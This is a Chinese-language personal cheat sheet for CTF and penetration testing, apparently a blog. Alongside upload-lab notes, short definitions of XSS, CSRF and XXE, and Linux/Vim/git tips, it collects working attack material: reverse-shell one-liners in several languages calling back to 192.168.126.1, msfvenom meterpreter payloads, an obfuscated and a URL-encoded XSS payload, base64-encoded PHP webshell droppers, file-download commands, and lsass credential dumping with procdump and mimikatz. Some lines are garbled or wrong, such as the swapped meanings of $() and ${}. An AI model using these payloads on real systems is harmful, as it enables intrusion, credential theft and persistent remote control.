推荐使用作者给的环境:下载地址
有些漏洞对环境要求比较高
Pass-01
上传PHP后缀的文件,发现没有经过BurpSuite就弹出警告,这种情况是前端JavaScript检测造成的。
'XSS'
XSS(Cross-Site script)跨站脚本攻击。
XSS最大的特点就是能注入恶意的代码到用户浏览器的网页上,从而达到劫持用户会话的目的。
是一种经常出现再web应用程序中的计算机安全漏洞,是由于web应用程序对用户的输入过滤不严而产生的。攻击者利用网站漏洞把恶意的脚本代码注入到网页中,当其他用户浏览这些网页时,就会执行其中的恶意代码,对受害用户可能采用cookie资料窃取,会话劫持,钓鱼欺骗等攻击手段。
'Cheat Sheet'
CTF
流程
1.查看源代码
2.查看robots.txt
linux下空格绕过
1 | cat flag.txt |
${IFS}
Shell 脚本中有个变量叫IFS(Internal Field Seprator) ,内部域分隔符。完整定义是The shell uses the value stored in IFS, which is the space, tab, and newline characters by default, to delimit words for the read and set commands, when parsing output from command substitution, and when performing variable substitution.
PHP is_numeric 绕过
使用十六进制绕过
PHP assert()
执行多个命令
1 | <?php |
outguess
1 | outguess -r picture text |
Linux
python导入bash
1 | python -c 'import pty;pty.spawn("/bin/sh")' |
设置ssh使用root登录
1 | vim /etc/ssh/sshd_config |
开机启动ssh服务
1 | update-rc.d ssh enable |
bash_history
复制粘贴
1 | 复制命令:Ctrl + Shift + C |
1 | ctrl + 鼠标选中后粘贴会立即执行 |
\$()和\${}
\$()是变量替换
\${}是命令替换
添加用户
1 | useradd -d "/home/chessur" -m -s "/bin/bash" chessur |
ufw
1 | ufw default deny //设置端口默认关闭 |
单用户模式
开机选advanced,按e,找到ro recovery nomodeset,修改为rw single init=/bin/bash ,修改之后按F10或Ctrl+X进入单用户模式
将显示用base64编码
1 | cat index.php | base64 |
firewall
1 | firewall-cmd --zone=public --add-port=80/tcp --permanent |
Vim
修改tab为四个空格
1 | vim /etc/vimrc |
MySQL
更改secure_file_priv
没有my.ini,my.cnf里什么都没有,MySQL版本5.7.26
1 | vim /etc/mysql/my.cnf |
参考:
can’t set secure_file_priv on mysql 5.7 Ubuntu 16.04
版本
5.0增加information_schema
4.0支持union
反弹shell
Bash
1 | bash -i >& /dev/tcp/192.168.126.1/6666 0>&1 |
PERL
1 | perl -e 'use Socket;$i="192.168.126.1";$p=6666;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' |
python
1 | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.126.1",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' |
PHP
1 | php -r '$sock=fsockopen("192.168.126.1",6666);exec("/bin/sh -i <&3 >&3 2>&3");' |
Ruby
1 | ruby -rsocket -e'f=TCPSocket.open("192.168.126.1",6666).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' |
Netcat
1 | nc -e /bin/sh 192.168.126.1 6666 |
其他
1 | rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.126.1 6666 >/tmp/f |
Java
1 | r = Runtime.getRuntime() |
图片反弹Shell
工具:https://github.com/peewpw/Invoke-PSImage
1 | msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.126.1 LPORT=6666 -f psh-reflection -o /root/image_shell.ps1 |
Kali
weevely
1 | weevely generate Windy /root/windy.php |
修改桥接静态IP
1.VMware选择网卡
2.修改配置文件
1 | vim /etc/network/interfaces |
XSS
payload
1 | javascript:alert(1) |
�空子节
1 | <script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.__$+")"+"\"")())()</script> |
url转码
1 | %3C%73%63%72%69%70%74%3E%24%3D%7E%5B%5D%3B%24%3D%7B%5F%5F%5F%3A%2B%2B%24%2C%24%24%24%24%3A%28%21%5B%5D%2B%22%22%29%5B%24%5D%2C%5F%5F%24%3A%2B%2B%24%2C%24%5F%24%5F%3A%28%21%5B%5D%2B%22%22%29%5B%24%5D%2C%5F%24%5F%3A%2B%2B%24%2C%24%5F%24%24%3A%28%7B%7D%2B%22%22%29%5B%24%5D%2C%24%24%5F%24%3A%28%24%5B%24%5D%2B%22%22%29%5B%24%5D%2C%5F%24%24%3A%2B%2B%24%2C%24%24%24%5F%3A%28%21%22%22%2B%22%22%29%5B%24%5D%2C%24%5F%5F%3A%2B%2B%24%2C%24%5F%24%3A%2B%2B%24%2C%24%24%5F%5F%3A%28%7B%7D%2B%22%22%29%5B%24%5D%2C%24%24%5F%3A%2B%2B%24%2C%24%24%24%3A%2B%2B%24%2C%24%5F%5F%5F%3A%2B%2B%24%2C%24%5F%5F%24%3A%2B%2B%24%7D%3B%24%2E%24%5F%3D%28%24%2E%24%5F%3D%24%2B%22%22%29%5B%24%2E%24%5F%24%5D%2B%28%24%2E%5F%24%3D%24%2E%24%5F%5B%24%2E%5F%5F%24%5D%29%2B%28%24%2E%24%24%3D%28%24%2E%24%2B%22%22%29%5B%24%2E%5F%5F%24%5D%29%2B%28%28%21%24%29%2B%22%22%29%5B%24%2E%5F%24%24%5D%2B%28%24%2E%5F%5F%3D%24%2E%24%5F%5B%24%2E%24%24%5F%5D%29%2B%28%24%2E%24%3D%28%21%22%22%2B%22%22%29%5B%24%2E%5F%5F%24%5D%29%2B%28%24%2E%5F%3D%28%21%22%22%2B%22%22%29%5B%24%2E%5F%24%5F%5D%29%2B%24%2E%24%5F%5B%24%2E%24%5F%24%5D%2B%24%2E%5F%5F%2B%24%2E%5F%24%2B%24%2E%24%3B%24%2E%24%24%3D%24%2E%24%2B%28%21%22%22%2B%22%22%29%5B%24%2E%5F%24%24%5D%2B%24%2E%5F%5F%2B%24%2E%5F%2B%24%2E%24%2B%24%2E%24%24%3B%24%2E%24%3D%28%24%2E%5F%5F%5F%29%5B%24%2E%24%5F%5D%5B%24%2E%24%5F%5D%3B%24%2E%24%28%24%2E%24%28%24%2E%24%24%2B%22%5C%22%22%2B%24%2E%24%5F%24%5F%2B%28%21%5B%5D%2B%22%22%29%5B%24%2E%5F%24%5F%5D%2B%24%2E%24%24%24%5F%2B%22%5C%5C%22%2B%24%2E%5F%5F%24%2B%24%2E%24%24%5F%2B%24%2E%5F%24%5F%2B%24%2E%5F%5F%2B%22%28%22%2B%24%2E%5F%5F%24%2B%22%29%22%2B%22%5C%22%22%29%28%29%29%28%29%3C%2F%73%63%72%69%70%74%3E |
1 | <script>eval(' |
1 | <script>eval(' |
1 | <script>eval(' |
获取usertoken
1 | <iframe src="../csrf"onload=alert(frames[0].document.getElementsByName('user_token')[0].value)> |
PHP
伪协议
写一句话
1 | <?php echo `echo PD9waHAgQGV2YWwoJF9QT1NUWydXaW5keSddKT8+|base64 -d > upload/1.php` ;?> |
1 | <?php fputs(fopen('./Windy.php','w'),base64_decode('PD9waHAgZXZhbCgkX1BPU1RbV2luZHldKTs/Pg=='));?> |
一句话写上传马
1 | ?a=fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(base64_decode(UEQ5d2FIQWdEUXBBSkhSbGJYQWdQU0FrWDBaSlRFVlRXeWQxY0d4dllXUmZabWxzWlNkZFd5ZDBiWEJmYm1GdFpTZGRPdzBLUUNSbWFXeGxJRDBnWW1GelpXNWhiV1VvSkY5R1NVeEZVMXNuZFhCc2IyRmtYMlpwYkdVblhWc25ibUZ0WlNkZEtUc05DbWxtSUNobGJYQjBlU0FvSkdacGJHVXBLWHNOQ21WamFHOGdJanhtYjNKdElHRmpkR2x2YmlBOUlDY25JRzFsZEdodlpDQTlJQ2RRVDFOVUp5QkZUa05VV1ZCRlBTZHRkV3gwYVhCaGNuUXZabTl5YlMxa1lYUmhKejVjYmlJN1pXTm9ieUFpVEc5allXd2dabWxzWlRvZ1BHbHVjSFYwSUhSNWNHVWdQU0FuWm1sc1pTY2dibUZ0WlNBOUlDZDFjR3h2WVdSZlptbHNaU2MrWEc0aU8yVmphRzhnSWp4cGJuQjFkQ0IwZVhCbElEMGdKM04xWW0xcGRDY2dkbUZzZFdVZ1BTQW5WWEJzYjJGa0p6NWNiaUk3WldOb2J5QWlQQzltYjNKdFBseHVQSEJ5WlQ1Y2JseHVQQzl3Y21VK0lqdDlaV3h6WlNCN2FXWW9iVzkyWlY5MWNHeHZZV1JsWkY5bWFXeGxLQ1IwWlcxd0xDUm1hV3hsS1NsN1pXTm9ieUFpUm1sc1pTQjFjR3h2WVdSbFpDQnpkV05qWlhOelpuVnNiSGt1UEhBK1hHNGlPMzFsYkhObElIdGxZMmh2SUNKVmJtRmliR1VnZEc4Z2RYQnNiMkZrSUNJZ0xpQWtabWxzWlNBdUlDSXVQSEErWEc0aU8zMTlQejQ9))); |
1 | <?php |
终止解析
1 | <style>body{font-size: 0;} h1{font-size: 12px !important;}</style><h1><?php echo "<hr />THIS IMAGE COULD ERASE YOUR WWW ACCOUNT, it shows you the PHP info instead...<hr />"; eval($_POST[Windy]); __halt_compiler(); ?></h1> |
MSF
执行命令反弹shell,支持PHP,Python
1 | use exploit/multi/script/web_delivery |
生成php反弹shell
1 | msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.126.126 lport=126 -f raw -o reverse_shell.php |
添加路由,在meterpreter下
1 | run autoroute -s 192.168.126.0/24 |
扫描存活主机
1 | use auxiliary/scanner/discovery/arp_sweep |
socks代理
1 | use auxiliary/server/socks4a |
msfvenom
1 | -e 编码 |
msfvenom自动补全
1.安装zsh
2.新建~/.oh-my-zsh/custom/plugins/msfvenom
3.将脚本放在上面的目录
4.编辑zsh配置文件
1 | vim ~/.zshrc |
5.更新zshsource ~/.zshrc
command shell 升级 meterpreter shell
1 | Ctrl + Z |
Mysql
命令行导入数据库
1 | mysql -uroot -pPassword databasename < filedir |
后台拿Shell
修改模板代码
修改上传图片格式
上传模板若会自动解压,可以上传zip压缩包
WebShell
WebShell的权限
Webshell的权限一般是由解析执行WebShell的Web容器自身权限决定的
如果是linux做了操作系统加固 能上传 但是只能执行系统命令权限 但是无法获得shell那就说明做了目录权限加固但是没有做中间件加固(可上传)没做操作系统加固
目录加固的权限是可读可执行但不可写
Windows提权
PowerShell提权
DOS下载文件
1.创建downfile.vbs下载文件
1 | echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >> downfile.vbs |
2.使用bitsadmin命令
1 | bitsadmin /transfer n http://www.xx.com/code.jpg c:\users\sdyp\desktop\ff.jpg |
PR提权
1 | pr.exe "net user chessur 123.com /add" 添加用户 |
名词解释
钓鱼攻击
水坑攻击
一种计算机入侵手法,其针对的目标多为特定的团体(组织、行业、地区等)。攻击者首先通过猜测(或观察)确定这组目标经常访问的网站,并入侵其中一个或多个,植入恶意软件,最后,达到感染该组目标中部分成员的目的。
信息收集
员工信息
社交关系网
博客
工资银行账户
企业使用软件信息
业务伙伴
销售银行账号
招聘岗位
JavaScript编码
1 | var code = '\u003c' |
抓Hash
procdump
Windows自带的提取dump工具,可以不被杀软杀掉
1 | procdump.exe -accepteula -ma lsass.exe lsass.dmp |
然后使用mimikatz查看
1 | sekurlsa::minidump lsass.dmp |
win10测试无法使用mimikatz查看,版本Build 17763
WinXP可以使用
计划任务
Windows
at
Vim
块选择,Ctrl+V
设置Tab为四个空格
1 | vim /etc/vim/vimrc |
对已保存的文件,可以使用以下命令进行空格和Tab的替换
Tab替换为空格
1 | :set ts=4 |
空格替换为Tab
1 | :set ts=4 |
git
添加配置
1 | git config --global http.proxy IP:port |
删除配置
1 | git config --global --unset http.proxy |
VS Code
PHP插件
PHP Debug
需求:
需要设置XDebug
作用
开启PHP调试功能
PHP intelliSense
需求:
配置PHP7.0以上版本为环境变量
作用:
自动补全
显示函数所需参数
跳转函数定义
搜索函数调用
'CSRF'
CSRF(Cross Site Request Forgery, 跨站请求伪造)是一种网络的攻击方式,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF。
CSRF漏洞是因为web应用程序在用户进行敏感操作时,如修改账号密码、添加账号、转账等,没有校验表单token或者http请求头中的referer值,从而导致恶意攻击者利用普通用户的身份(cookie)完成攻击行为。
'XXE'
XML外部实体攻击是一种应用层攻击,攻击的前提是应用能够解析XML。XXE发生的场景通常是用户在XML输入中包含了外部实体引用,且该外部实体也能被错误配置的XML解析器解析。从解析器所在的主机角度来看,这种攻击可能会引起机密信息泄漏、拒绝服务攻击、服务器请求伪造、端口扫描和其他系统影响。
